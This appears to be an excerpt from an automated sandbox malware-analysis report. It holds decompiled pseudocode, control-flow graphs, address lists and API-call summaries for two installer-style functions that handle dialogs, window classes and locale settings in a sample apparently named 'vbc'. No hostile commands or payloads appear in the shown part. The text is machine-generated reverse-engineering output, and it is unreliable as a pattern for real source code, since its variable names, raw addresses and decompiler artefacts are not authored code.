                                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 199->198 213 4041d0-4041eb 200->213 205 40418d-404198 call 401389 201->205 206 4041be-4041c0 201->206 202->203 208 403fe5-403fff ShowWindow 203->208 209 404027-40402d 203->209 205->206 230 40419a-4041b9 SendMessageW 205->230 206->200 212 404466 206->212 214 404100-40410e call 404500 208->214 215 404005-404018 GetWindowLongW 208->215 216 404046-404049 209->216 217 40402f-404041 DestroyWindow 209->217 219 404468-40446f 212->219 226 4041f4-4041fa 213->226 227 4041ed-4041ef call 40140b 213->227 214->219 215->214 228 40401e-404021 ShowWindow 215->228 222 40404b-404057 SetWindowLongW 216->222 223 40405c-404062 216->223 220 404443-404449 217->220 220->212 233 40444b-404451 220->233 222->219 223->214 229 404068-404077 GetDlgItem 223->229 234 404200-40420b 226->234 235 404424-40443d DestroyWindow EndDialog 226->235 227->226 228->209 236 404096-404099 229->236 237 404079-404090 SendMessageW IsWindowEnabled 229->237 230->219 233->212 238 404453-40445c ShowWindow 233->238 234->235 239 404211-40425e call 40657a call 404499 * 3 GetDlgItem 234->239 235->220 241 40409b-40409c 236->241 242 40409e-4040a1 236->242 237->212 237->236 238->212 266 404260-404265 239->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 239->267 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->214 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->214 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->214 263 4040de-4040e8 254->263 264 4040ca 255->264 263->264 264->244 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->213 286 404339-40433b 275->286 286->213 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->220 290 40437e-4043ab CreateDialogParamW 288->290 289->212 291 404353-404359 289->291 290->220 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->293 291->213 292 40435f 291->292 292->212 293->212 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->220
                                                C-Code - Quality: 84%
                                                			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                				struct HWND__* _v28;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				struct HWND__* _t48;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t117;
                                                				int _t118;
                                                				int _t122;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				intOrPtr _t130;
                                                				long _t133;
                                                				int _t135;
                                                				int _t136;
                                                				void* _t137;
                                                
                                                				_t130 = _a8;
                                                				if(_t130 == 0x110 || _t130 == 0x408) {
                                                					_t34 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t130 - 0x110;
                                                					 *0x42d250 = _t34;
                                                					if(_t130 == 0x110) {
                                                						 *0x434f08 = _t127;
                                                						 *0x42d264 = GetDlgItem(_t127, 1);
                                                						_t91 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x42b230 = _t91;
                                                						E00404499(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                						 *0x433ecc = E0040140B(4);
                                                						_t34 = 1;
                                                						__eflags = 1;
                                                						 *0x42d250 = 1;
                                                					}
                                                					_t124 =  *0x40a368; // 0x0
                                                					_t136 = 0;
                                                					_t133 = (_t124 << 6) +  *0x434f20;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L36:
                                                						E004044E5(0x40b);
                                                						while(1) {
                                                							_t36 =  *0x42d250;
                                                							 *0x40a368 =  *0x40a368 + _t36;
                                                							_t133 = _t133 + (_t36 << 6);
                                                							_t38 =  *0x40a368; // 0x0
                                                							__eflags = _t38 -  *0x434f24;
                                                							if(_t38 ==  *0x434f24) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x433ecc - _t136;
                                                							if( *0x433ecc != _t136) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t133 + 0x14);
                                                							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404499(_t127);
                                                							_t48 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x434f8c - _t136;
                                                							_v28 = _t48;
                                                							if( *0x434f8c != _t136) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                							E004044BB(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x42b230, _t118);
                                                							__eflags = _t118 - _t136;
                                                							if(_t118 == _t136) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t136);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                							__eflags =  *0x434f8c - _t136;
                                                							if( *0x434f8c == _t136) {
                                                								_push( *0x42d264);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t136);
                                                								_push( *0x42b230);
                                                							}
                                                							E004044CE();
                                                							E0040653D(0x42d268, E00403F7B());
                                                							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                							SetWindowTextW(_t127, 0x42d268); // executed
                                                							_push(_t136);
                                                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t133 - _t136;
                                                								if( *_t133 == _t136) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t133 + 4) - 5;
                                                								if( *(_t133 + 4) != 5) {
                                                									DestroyWindow( *0x433ed8); // executed
                                                									 *0x42c240 = _t133;
                                                									__eflags =  *_t133 - _t136;
                                                									if( *_t133 <= _t136) {
                                                										goto L60;
                                                									}
                                                									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                									__eflags = _t73 - _t136;
                                                									 *0x433ed8 = _t73;
                                                									if(_t73 == _t136) {
                                                										goto L60;
                                                									}
                                                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                									_push(6);
                                                									E00404499(_t73);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                									ScreenToClient(_t127, _t137 + 0x10);
                                                									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                									_push(_t136);
                                                									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                									__eflags =  *0x433ecc - _t136;
                                                									if( *0x433ecc != _t136) {
                                                										goto L63;
                                                									}
                                                									ShowWindow( *0x433ed8, 8); // executed
                                                									E004044E5(0x405);
                                                									goto L60;
                                                								}
                                                								__eflags =  *0x434f8c - _t136;
                                                								if( *0x434f8c != _t136) {
                                                									goto L63;
                                                								}
                                                								__eflags =  *0x434f80 - _t136;
                                                								if( *0x434f80 != _t136) {
                                                									continue;
                                                								}
                                                								goto L63;
                                                							}
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x434f08 = _t136;
                                                						EndDialog(_t127,  *0x42ba38);
                                                						goto L60;
                                                					} else {
                                                						__eflags = _t34 - 1;
                                                						if(_t34 != 1) {
                                                							L35:
                                                							__eflags =  *_t133 - _t136;
                                                							if( *_t133 == _t136) {
                                                								goto L63;
                                                							}
                                                							goto L36;
                                                						}
                                                						_push(0);
                                                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L35;
                                                						}
                                                						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                						__eflags =  *0x433ecc;
                                                						return 0 |  *0x433ecc == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t136 = 0;
                                                					if(_t130 == 0x47) {
                                                						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					_t122 = _a12;
                                                					if(_t130 != 5) {
                                                						L8:
                                                						if(_t130 != 0x40d) {
                                                							__eflags = _t130 - 0x11;
                                                							if(_t130 != 0x11) {
                                                								__eflags = _t130 - 0x111;
                                                								if(_t130 != 0x111) {
                                                									goto L28;
                                                								}
                                                								_t135 = _t122 & 0x0000ffff;
                                                								_t128 = GetDlgItem(_t127, _t135);
                                                								__eflags = _t128 - _t136;
                                                								if(_t128 == _t136) {
                                                									L15:
                                                									__eflags = _t135 - 1;
                                                									if(_t135 != 1) {
                                                										__eflags = _t135 - 3;
                                                										if(_t135 != 3) {
                                                											_t129 = 2;
                                                											__eflags = _t135 - _t129;
                                                											if(_t135 != _t129) {
                                                												L27:
                                                												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                												goto L28;
                                                											}
                                                											__eflags =  *0x434f8c - _t136;
                                                											if( *0x434f8c == _t136) {
                                                												_t99 = E0040140B(3);
                                                												__eflags = _t99;
                                                												if(_t99 != 0) {
                                                													goto L28;
                                                												}
                                                												 *0x42ba38 = 1;
                                                												L23:
                                                												_push(0x78);
                                                												L24:
                                                												E00404472();
                                                												goto L28;
                                                											}
                                                											E0040140B(_t129);
                                                											 *0x42ba38 = _t129;
                                                											goto L23;
                                                										}
                                                										__eflags =  *0x40a368 - _t136; // 0x0
                                                										if(__eflags <= 0) {
                                                											goto L27;
                                                										}
                                                										_push(0xffffffff);
                                                										goto L24;
                                                									}
                                                									_push(_t135);
                                                									goto L24;
                                                								}
                                                								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                								_t103 = IsWindowEnabled(_t128);
                                                								__eflags = _t103;
                                                								if(_t103 == 0) {
                                                									L63:
                                                									return 0;
                                                								}
                                                								goto L15;
                                                							}
                                                							SetWindowLongW(_t127, _t136, _t136);
                                                							return 1;
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x433ed8 = _t122;
                                                						L60:
                                                						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                							ShowWindow(_t127, 0xa); // executed
                                                							 *0x42f268 = 1;
                                                						}
                                                						goto L63;
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                							L28:
                                                							return E00404500(_a8, _t122, _a16);
                                                						} else {
                                                							ShowWindow(_t127, 4);
                                                							goto L8;
                                                						}
                                                					}
                                                				}
                                                			}































                                                0x00403fa5
                                                0x00403fac
                                                0x00404113
                                                0x00404117
                                                0x0040411b
                                                0x0040411d
                                                0x00404122
                                                0x0040412d
                                                0x00404138
                                                0x0040413d
                                                0x0040413f
                                                0x00404141
                                                0x00404144
                                                0x00404149
                                                0x00404157
                                                0x00404164
                                                0x0040416b
                                                0x0040416b
                                                0x0040416c
                                                0x0040416c
                                                0x00404171
                                                0x00404177
                                                0x0040417e
                                                0x00404184
                                                0x00404186
                                                0x004041c6
                                                0x004041cb
                                                0x004041d0
                                                0x004041d0
                                                0x004041d5
                                                0x004041de
                                                0x004041e0
                                                0x004041e5
                                                0x004041eb
                                                0x004041ef
                                                0x004041ef
                                                0x004041f4
                                                0x004041fa
                                                0x00000000
                                                0x00000000
                                                0x00404205
                                                0x0040420b
                                                0x00000000
                                                0x00000000
                                                0x00404214
                                                0x0040421c
                                                0x00404221
                                                0x00404224
                                                0x0040422a
                                                0x0040422f
                                                0x00404232
                                                0x00404238
                                                0x0040423d
                                                0x00404240
                                                0x00404246
                                                0x0040424e
                                                0x00404254
                                                0x0040425a
                                                0x0040425e
                                                0x00404265
                                                0x00404265
                                                0x00404265
                                                0x0040426f
                                                0x00404281
                                                0x0040428d
                                                0x00404292
                                                0x0040429c
                                                0x004042a2
                                                0x004042a4
                                                0x004042a9
                                                0x004042a6
                                                0x004042a6
                                                0x004042a6
                                                0x004042b9
                                                0x004042d1
                                                0x004042d3
                                                0x004042d9
                                                0x004042ee
                                                0x004042db
                                                0x004042e4
                                                0x004042e6
                                                0x004042e6
                                                0x004042f4
                                                0x00404305
                                                0x0040431b
                                                0x00404322
                                                0x00404328
                                                0x0040432c
                                                0x00404331
                                                0x00404333
                                                0x00000000
                                                0x00404339
                                                0x00404339
                                                0x0040433b
                                                0x00000000
                                                0x00000000
                                                0x00404341
                                                0x00404345
                                                0x0040436a
                                                0x00404370
                                                0x00404376
                                                0x00404378
                                                0x00000000
                                                0x00000000
                                                0x0040439e
                                                0x004043a4
                                                0x004043a6
                                                0x004043ab
                                                0x00000000
                                                0x00000000
                                                0x004043b1
                                                0x004043b4
                                                0x004043b7
                                                0x004043ce
                                                0x004043da
                                                0x004043f3
                                                0x004043f9
                                                0x004043fd
                                                0x00404402
                                                0x00404408
                                                0x00000000
                                                0x00000000
                                                0x00404412
                                                0x0040441d
                                                0x00000000
                                                0x0040441d
                                                0x00404347
                                                0x0040434d
                                                0x00000000
                                                0x00000000
                                                0x00404353
                                                0x00404359
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040435f
                                                0x00404333
                                                0x0040442a
                                                0x00404436
                                                0x0040443d
                                                0x00000000
                                                0x00404188
                                                0x00404188
                                                0x0040418b
                                                0x004041be
                                                0x004041be
                                                0x004041c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004041c0
                                                0x0040418d
                                                0x00404191
                                                0x00404196
                                                0x00404198
                                                0x00000000
                                                0x00000000
                                                0x004041a8
                                                0x004041b0
                                                0x00000000
                                                0x004041b6
                                                0x00403fbe
                                                0x00403fbe
                                                0x00403fc2
                                                0x00403fc7
                                                0x00403fd6
                                                0x00403fd6
                                                0x00403fdc
                                                0x00403fe3
                                                0x00404027
                                                0x0040402d
                                                0x00404046
                                                0x00404049
                                                0x0040405c
                                                0x00404062
                                                0x00000000
                                                0x00000000
                                                0x00404068
                                                0x00404073
                                                0x00404075
                                                0x00404077
                                                0x00404096
                                                0x00404096
                                                0x00404099
                                                0x0040409e
                                                0x004040a1
                                                0x004040b1
                                                0x004040b2
                                                0x004040b4
                                                0x004040ea
                                                0x004040fa
                                                0x00000000
                                                0x004040fa
                                                0x004040b6
                                                0x004040bc
                                                0x004040d5
                                                0x004040da
                                                0x004040dc
                                                0x00000000
                                                0x00000000
                                                0x004040de
                                                0x004040ca
                                                0x004040ca
                                                0x004040cc
                                                0x004040cc
                                                0x00000000
                                                0x004040cc
                                                0x004040bf
                                                0x004040c4
                                                0x00000000
                                                0x004040c4
                                                0x004040a3
                                                0x004040a9
                                                0x00000000
                                                0x00000000
                                                0x004040ab
                                                0x00000000
                                                0x004040ab
                                                0x0040409b
                                                0x00000000
                                                0x0040409b
                                                0x00404081
                                                0x00404088
                                                0x0040408e
                                                0x00404090
                                                0x00404466
                                                0x00000000
                                                0x00404466
                                                0x00000000
                                                0x00404090
                                                0x0040404e
                                                0x00000000
                                                0x00404056
                                                0x00404035
                                                0x0040403b
                                                0x00404443
                                                0x00404449
                                                0x00404456
                                                0x0040445c
                                                0x0040445c
                                                0x00000000
                                                0x00403fe5
                                                0x00403fea
                                                0x00403ff6
                                                0x00403fff
                                                0x00404100
                                                0x00000000
                                                0x0040401e
                                                0x00404021
                                                0x00000000
                                                0x00404021
                                                0x00403fff
                                                0x00403fe3

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                • DestroyWindow.USER32 ref: 00404035
                                                • SetWindowLongW.USER32 ref: 0040404E
                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                • GetSystemMenu.USER32 ref: 004042B2
                                                • EnableMenuItem.USER32 ref: 004042B9
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                • SetWindowTextW.USER32 ref: 00404322
                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 121052019-0
                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 345 403df3-403df6 330->345 346 403dfb-403e06 call 403ec2 330->346 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 344 403d0a-403d14 GetFileAttributesW 340->344 349 403d16-403d18 344->349 350 403d1a-403d1b call 405e58 344->350 345->338 354 403e0c-403e26 ShowWindow call 40689a 346->354 355 403e8f-403e90 call 405672 346->355 349->339 349->350 350->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->335 361->345 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->345 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                                C-Code - Quality: 96%
                                                			E00403BEC(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x434f10;
                                                				_t22 = E0040690A(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x42d268;
                                                					L"1033" = 0x30;
                                                					 *0x442002 = 0x78;
                                                					 *0x442004 = 0;
                                                					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                					__eflags =  *0x42d268;
                                                					if(__eflags == 0) {
                                                						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403EC2(_t78, _t90);
                                                				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                				 *0x434f9c = 0x10000;
                                                				if(E00405F14(_t90, 0x440800) != 0) {
                                                					L16:
                                                					if(E00405F14(_t98, 0x440800) == 0) {
                                                						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                                                					}
                                                					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040);
                                                					 *0x433ee8 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403EC2(_t78, __eflags);
                                                							__eflags =  *0x434fa0;
                                                							if( *0x434fa0 != 0) {
                                                								_t33 = E00405672(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x433ecc;
                                                								if( *0x433ecc == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x42d248, 5); // executed
                                                							_t39 = E0040689A("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E0040689A("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                								 *0x433ec4 = _t87;
                                                								RegisterClassW(0x433ea0);
                                                							}
                                                							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                							E00403B3C(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x434f00;
                                                						 *0x433ea4 = E00401000;
                                                						 *0x433eb0 =  *0x434f00;
                                                						 *0x433eb4 = _t30;
                                                						 *0x433ec4 = 0x40a380;
                                                						if(RegisterClassW(0x433ea0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					_t92 = _t78;
                                                					if(_t78 == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x432ea0;
                                                					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                					_t63 =  *0x432ea0; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x432ea2;
                                                						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E0040653D(0x440800, E00405E0C(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405E58(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00403bf2
                                                0x00403bfb
                                                0x00403c02
                                                0x00403c04
                                                0x00403c18
                                                0x00403c2a
                                                0x00403c33
                                                0x00403c3c
                                                0x00403c43
                                                0x00403c48
                                                0x00403c4f
                                                0x00403c62
                                                0x00403c62
                                                0x00403c6d
                                                0x00403c06
                                                0x00403c11
                                                0x00403c11
                                                0x00403c72
                                                0x00403c85
                                                0x00403c8a
                                                0x00403c9b
                                                0x00403d2d
                                                0x00403d35
                                                0x00403d3e
                                                0x00403d3e
                                                0x00403d54
                                                0x00403d5a
                                                0x00403d68
                                                0x00403de9
                                                0x00403df1
                                                0x00403dfb
                                                0x00403e00
                                                0x00403e06
                                                0x00403e90
                                                0x00403e95
                                                0x00403e97
                                                0x00403eb3
                                                0x00000000
                                                0x00403eb3
                                                0x00403e99
                                                0x00403e9f
                                                0x00403ea7
                                                0x00403ea7
                                                0x00000000
                                                0x00403e9f
                                                0x00403e14
                                                0x00403e1f
                                                0x00403e24
                                                0x00403e26
                                                0x00403e2d
                                                0x00403e2d
                                                0x00403e38
                                                0x00403e40
                                                0x00403e42
                                                0x00403e44
                                                0x00403e4d
                                                0x00403e50
                                                0x00403e56
                                                0x00403e56
                                                0x00403e75
                                                0x00403e86
                                                0x00000000
                                                0x00403e8b
                                                0x00403df3
                                                0x00403df5
                                                0x00000000
                                                0x00403d6a
                                                0x00403d6a
                                                0x00403d76
                                                0x00403d80
                                                0x00403d86
                                                0x00403d8b
                                                0x00403d9a
                                                0x00403eb8
                                                0x00403eb8
                                                0x00000000
                                                0x00403eb8
                                                0x00403da9
                                                0x00403de4
                                                0x00000000
                                                0x00403de4
                                                0x00403ca1
                                                0x00403ca1
                                                0x00403ca4
                                                0x00403ca6
                                                0x00000000
                                                0x00000000
                                                0x00403cb4
                                                0x00403cc6
                                                0x00403ccb
                                                0x00403cd4
                                                0x00000000
                                                0x00000000
                                                0x00403cda
                                                0x00403cdc
                                                0x00403ce9
                                                0x00403ce9
                                                0x00403cf2
                                                0x00403cf8
                                                0x00403d20
                                                0x00403d28
                                                0x00000000
                                                0x00403d0a
                                                0x00403d0b
                                                0x00403d14
                                                0x00403d1a
                                                0x00403d1b
                                                0x00000000
                                                0x00403d1b
                                                0x00403d16
                                                0x00403d18
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d18
                                                0x00403cf8

                                                APIs
                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
